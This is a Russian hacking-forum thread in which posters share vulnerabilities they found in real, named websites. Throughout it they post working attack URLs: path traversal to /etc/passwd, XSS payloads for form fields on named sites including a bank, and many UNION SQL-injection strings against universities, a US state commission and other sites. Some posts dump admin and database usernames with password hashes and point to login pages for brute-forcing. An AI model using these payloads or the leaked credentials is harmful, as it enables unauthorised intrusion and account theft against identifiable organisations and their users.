Хак! Ломать не строить - это уметь надо

Уязвимости найденные вами

,

sql-inj, php-incl, xss...

Дата публикации:

de1ay, 13.06.2007 - 21:22

Начну я. smile.gif
Инклюд для начала.
QUOTE
http://ai.isi.edu/ind.../../etc/passwd

zombie18, 16.06.2007 - 9:27

ну вот xss докучи...
QUOTE
http://www.transtech.ru/Anketa/anketa1.htm

в поле Ф.И.О. вписываем
CODE
"><script>alert(/xss/)</script>

+1
QUOTE
http://www.regent.ru/about/graduates.html

помоему в любое поле вообще... такую же байду:
CODE
"><script>alert(/xss/)</script>

+1
QUOTE
http://www.vms.ru/pages/atketa.php

тоже куда хошь... ниче не фильтруется...
CODE
"><script>alert(/xss/)</script>

+1
QUOTE
http://www.osp.ru/

в поиске пишем:
CODE
"><script>alert(/xss/)</script>

+1
вот тебе и юниаструм банк (^_~)
QUOTE
http://www.uniastrum.ru/ru/ml_form/

в поле Фамилия, Имя, Отчество: тот же баг у всех на ">
CODE
"><body onLoad=alert('xss')>

+1
QUOTE
http://intv.ru/

при регистрации поле "ник" не фильтруется, можно написаль там к примеру:
CODE
"><script>alert('xss')</script>

чтобы посмотреть пример залогиньтесь с
e-mail: [email protected]
password: cIRLlQ

+1
QUOTE
http://www.klerk.ru/subscribe/register.php

уязвимо поле e-mail. пример использования:
CODE
http://www.klerk.ru/subscribe/register.php?email=%22%3E%3Cscript%3Ealert(/xss/)%3C/script%3E

de1ay, 29.07.2007 - 21:15

CODE
http://www.oninit.com/reference/index.php?page=[url]

de1ay, 7.08.2007 - 18:30

LZA Terminologijas komisija
Один из местных универов.
CODE
http://termini.lza.lv/article.php?id=-1+union+select+1,2,3,concat_ws(user,0x3a,pass),5,6,7,8,9,1,2,3,4,5,6,7,8+from+users/*

user: red1
pass: $1$ugldXdZ6$D06H80Jn5ab5Ok3HymTv8/

de1ay, 21.08.2007 - 18:14

Big6: Information Skills for Student Achievement
Форум (цепляем по одному, кто админ незнаю, мемберлист не смотрел, там регаться надо smile.gif...):
Code
http://big6.com/showarticle.php?id=-1+union+select+concat_ws(username,0x3a,user_password),2,3,4,5+from+big6_users+limit+1,1/*

Блог (сразу админ):
Code
http://big6.com/showarticle.php?id=-1+union+select+concat_ws(user_login,0x3a,user_pass),2,3,4,5+from+blo_users+limit+0,1/*

Все хеши md5.

ZaHack, 21.08.2007 - 20:34

Не совсем по теме (тут больше веб-уязвимости), но все же:
Переполнение буфера обмена программы helpctr.exe
Уязвимые ОС: Win XP
При вводе в IE строки:

Code
hcp://w.w.w.w.w.w.w.w.w.w.w.w.w.w.w.w.w.w.w.w.w.w.w.w.w.w.w.w.


происходит запуск самой программы helpctr.exe Это происходит из-за возникновения в приложении исключения (которое вызывается удаленно из браузера)

PS Практического применения эта уязвимость, конечно, не имеет, но наглядно показывает "надежность" продуктов от M$

PPS Работает не на всех компьютерах.

de1ay, 21.08.2007 - 23:07

Цитата | Quote(ZaHack @ 21.08.2007 - 20:34)
PS Практического применения эта уязвимость, конечно, не имеет, но наглядно показывает "надежность" продуктов от M$
*


А почему нет? Переполненяем буфер, передаём управление шелл-коду... Все. smile.gif

de1ay, 28.08.2007 - 19:00

Code
http://www.varmint.org/ishop/index.php?GID=-1+union+select+1,2,version(),4,5,6,7,8,9,1,2/*

Таблицы лень подбирать... smile.gif

de1ay, 28.08.2007 - 19:14

ГОРОДСКОЙ ЭЛЕКТРОТРАНСПОРТ
совмещённый трамвайно-троллейбусный сайт

Code
http://stts.mosfont.ru/articles.php?gid=-1+union+select+1,table_name+from+information_schema.tables+limit+0,1/*

de1ay, 28.08.2007 - 20:06

www.crim.ncsu.edu
Center for Robotics and Intelligent Machines

Достаем логин и хеш:
Code
http://www.crim.ncsu.edu/project_detailed.php?id=-1+union+select+1,2,3,concat(user_login,0x3a,user_pass),5,6,7,8,9,1,2,3,4,5,6,7,8+from+wp_users+limit+0,1/*

admin:75bb40f591c0db371aba50f65741d73f

Можно сбрутить... Логинимся тут:
http://www.crim.ncsu.edu/login.php

Статическая инфа:
Версия: 5.0.19-max-log
Пользователь: [email protected]
База: wp_crim

de1ay, 18.09.2007 - 7:18

VLG - Veterinary Leadership Group

Code
http://www.vlg.us/users_info.php?user=-1+union+select+1,2,3,4,5,6,7,8,concat(adm_username,0x3a,adm_password),1,2,3,4,5,6,7,8,9,1,2,3,4,5,6,7,8,9,1,2,3,4,5,
6,7,8,9,1,2,3,4,5,6,7,8,9,1,2,3,4,5+from+cms_admin+limit+0,1/*


csos:2d7784bc6d2ee4d098ba1a941b8aeff6
jackrife:8c7516e35cc1316c549d2e0a6be7c3f4

http://www.vlg.us/login.php

de1ay, 27.09.2007 - 18:04

University of Chicago Experts Guide

Code
http://experts.uchicago.edu/experts.php?id=31+union+select+1,concat(user,0x3a,password),3,4,5,6,7,9,1,2,3,4,5,6,7, 8,9,1,2,3,4,5,6,7,8,9,1,2,3,4,5,6,7,8,9,1,2,3,4,5,6,3+from+mysql.user+limit+1,1/*


root:0bd914e54597ba5d
tim:6203790e5a8f045f
www:688190236b17cea9
rlvoyer:3ccc14724f83db34
---

de1ay, 7.11.2007 - 10:14

Проверка, настройка партнерских программ

Code
http://se-t.net/stat.php?from=0&pid=841+union+select+1 ,2,login,email,passwd+from+users/*


Логин\Пароль\Email

de1ay, 7.04.2008 - 15:00

Maine Commission for Community Service
Code
http://www.maineservicecommission.gov/MVF/article.php?ID=363+union+select+1,2,concat_ws
(0x3a,version(),database(),user()),4,5,6,7,8,9,1,2,3,4/*

4.1.20 : m41n3s3r_ : m41n3s3r_v0lunt3@localhost

dimusik, 5.01.2009 - 19:12

не нашёлся куда запостить, решил здесь

Depositfiles.com без 60сек

Найден баг на депозите теперь ждать 60 секунд не обязательно

Видео: 1440 x 900 3508Kbps
Формат: AVI
Звук: Нет
Продолжительность: 30 сек
Вес: 1.3 МБ

https://softoroom.org/...43-20.rar.html


В Опере поробовал вид-стиль-режим пользователя

Jon-dog, 31.05.2009 - 20:17

Давно сюда ничего не писали.smile.gif
http://www.optica.ru/...hp_shell'a


версия для печати -> Полная версия

SoftoRooM © 2004-2024